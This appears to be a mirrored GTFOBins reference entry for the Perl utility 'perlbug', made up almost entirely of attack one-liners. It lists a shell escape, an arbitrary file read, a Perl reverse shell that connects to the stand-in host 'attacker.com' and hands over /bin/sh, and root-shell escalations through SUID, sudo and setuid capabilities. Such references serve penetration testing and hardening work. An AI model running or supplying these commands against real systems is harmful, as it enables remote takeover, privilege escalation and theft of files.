1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00
GTFOBins.github.io/_gtfobins/perlbug.md

22 lines
773 B
Markdown
Raw Normal View History

2022-08-05 17:45:01 +02:00
---
functions:
shell:
- code: perlbug -e 'exec "/bin/sh";'
file-read:
- code: |
LFILE=file_to_read
perlbug -ne print $LFILE
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
perlbug -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid:
- code: ./perlbug -e 'exec "/bin/sh";'
sudo:
- code: sudo perlbug -e 'exec "/bin/sh";'
capabilities:
- code: ./perlbug -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
---